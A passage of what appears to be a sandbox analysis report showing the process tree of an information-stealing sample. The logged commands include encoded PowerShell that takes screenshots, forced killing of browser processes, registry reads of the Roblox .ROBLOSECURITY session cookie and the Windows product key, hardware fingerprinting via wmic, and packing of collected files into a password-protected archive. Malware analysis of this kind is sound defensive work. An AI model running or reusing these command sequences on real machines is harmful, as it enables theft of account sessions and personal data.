7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:6264
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0y1v02o0\0y1v02o0.cmdline"
        6⤵
        
        PID:4736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3406.tmp" "c:\Users\Admin\AppData\Local\Temp\0y1v02o0\CSCC38254D9D9DA4987BB181429AFA3D738.TMP"
        7⤵
        
        PID:6744
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4672
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6616
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6364
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:4432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2284
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6648
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3664
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:2644
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:6872
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:1748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5916"
      4⤵
      PID:6904
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5916
        5⤵
        Kills process with taskkill
        
        PID:3388
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1384"
      4⤵
      PID:5184
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1384
        5⤵
        Kills process with taskkill
        
        PID:6512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2556"
      4⤵
      PID:3212
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2556
        5⤵
        Kills process with taskkill
        
        PID:6880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6176"
      4⤵
      PID:6064
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6176
        5⤵
        Kills process with taskkill
        
        PID:4500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5100"
      4⤵
      PID:6200
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5100
        5⤵
        Kills process with taskkill
        
        PID:760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 6192"
      4⤵
      PID:3868
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 6192
        5⤵
        Kills process with taskkill
        
        PID:4432
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5196"
      4⤵
      PID:3368
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5196
        5⤵
        Kills process with taskkill
        
        PID:6992
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 5964"
      4⤵
      PID:6940
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 5964
        5⤵
        Kills process with taskkill
        
        PID:3840
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2368"
      4⤵
      PID:6924
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2368
        5⤵
        Kills process with taskkill
        
        PID:3236
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:7152
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5364
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:2032
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:1108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4572
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14962\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\BDsK8.zip" *"
      4⤵
      PID:6868
    - - C:\Users\Admin\AppData\Local\Temp\_MEI14962\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI14962\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\BDsK8.zip" *
        5⤵
        Executes dropped EXE
        
        PID:1916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:6968
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:6600
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:6756
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:6980
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:7116
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6540
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:6000
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:4872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1272
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:6272
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:6240

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3088
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Drops desktop.ini file(s)
  - Checks processor information in registry
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:4944
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1984 -prefsLen 27097 -prefMapHandle 1988 -prefMapSize 270279 -ipcHandle 2064 -initialChannelId {44ddfc0b-f533-4da7-9ccf-19bcd8bcba9c} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:6128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2428 -prefsLen 27133 -prefMapHandle 2432 -prefMapSize 270279 -ipcHandle 2440 -initialChannelId {5d6e8141-e324-4267-9ed7-14774e1094f6} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:1412
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3816 -prefsLen 27274 -prefMapHandle 3820 -prefMapSize 270279 -jsInitHandle 3824 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3832 -initialChannelId {56d40c20-8c5a-4c66-881a-d5d3da64f10b} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:4856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3980 -prefsLen 27274 -prefMapHandle 3984 -prefMapSize 270279 -ipcHandle 4060 -initialChannelId {3d823ec0-6073-4123-bc77-843288cb72a6} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:3372
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3128 -prefsLen 34773 -prefMapHandle 3220 -prefMapSize 270279 -jsInitHandle 3312 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3120 -initialChannelId {88034f1a-710f-47bc-a7eb-01663cc0a288} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:2096
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5064 -prefsLen 35010 -prefMapHandle 5068 -prefMapSize 270279 -ipcHandle 5072 -initialChannelId {2a721f96-737e-4c9b-81f2-3b6351db0d6e} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:5624
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5572 -prefsLen 32952 -prefMapHandle 5552 -prefMapSize 270279 -jsInitHandle 3112 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5584 -initialChannelId {4a240b37-1425-43d1-957d-f2a88f79a72b} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:3128
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5740 -prefsLen 32952 -prefMapHandle 5744 -prefMapSize 270279 -jsInitHandle 5748 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5752 -initialChannelId {8aa80f1b-79c9-4e6e-9589-64c5e14a0def} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:3068
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5924 -prefsLen 32952 -prefMapHandle 5928 -prefMapSize 270279 -jsInitHandle 5932 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5940 -initialChannelId {f8f5618d-5e9b-4e4a-b4ca-20256ba686f2} -parentPid 4944 -crashReporter "\\.\pipe\gecko-crash-server-pipe.4944" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:1560

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc474dcf8,0x7ffdc474dd04,0x7ffdc474dd10
  2⤵
  PID:2740
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1428,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2084 /prefetch:11
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2336,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2352 /prefetch:13
  2⤵
  PID:4432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3208,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3284 /prefetch:1
  2⤵
  PID:5724
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4188,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4204 /prefetch:9
  2⤵
  PID:4596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,15985533519115624732,15759714764057686428,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4696 /prefetch:1
  2⤵
  PID:1956

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc474dcf8,0x7ffdc474dd04,0x7ffdc474dd10
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1868,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2104 /prefetch:11
  2⤵
  PID:2556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2076,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2072 /prefetch:2
  2⤵
  PID:6176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2412,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=1852 /prefetch:13
  2⤵
  PID:5100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3376 /prefetch:1
  2⤵
  PID:6192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3464 /prefetch:1
  2⤵
  PID:5196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4216 /prefetch:9
  2⤵
  PID:5964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4632,i,2312587266973374500,2743865094165936661,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4660 /prefetch:1
  2⤵
  PID:2368

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:6276

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:5676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffdc474dcf8,0x7ffdc474dd04,0x7ffdc474dd10
  2⤵
  PID:3100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1480,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=2164 /prefetch:11
  2⤵
  PID:5064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2128,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=2124 /prefetch:2
  2⤵
  PID:3520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2428,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:13
  2⤵
  PID:4424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
  2⤵
  PID:6304
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3280,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=3316 /prefetch:1
  2⤵
  PID:2948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4240,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:9
  2⤵
  PID:5104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4648,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=4692 /prefetch:1
  2⤵
  PID:6364
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5276,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=5312 /prefetch:14
  2⤵
  PID:3236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5348,i,11794952827083093831,11979880425195925325,262144 --variations-seed-version --mojo-platform-channel-handle=5356 /prefetch:14
  2⤵
  PID:6768

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1164

C:\Windows\system32\svchost.exe
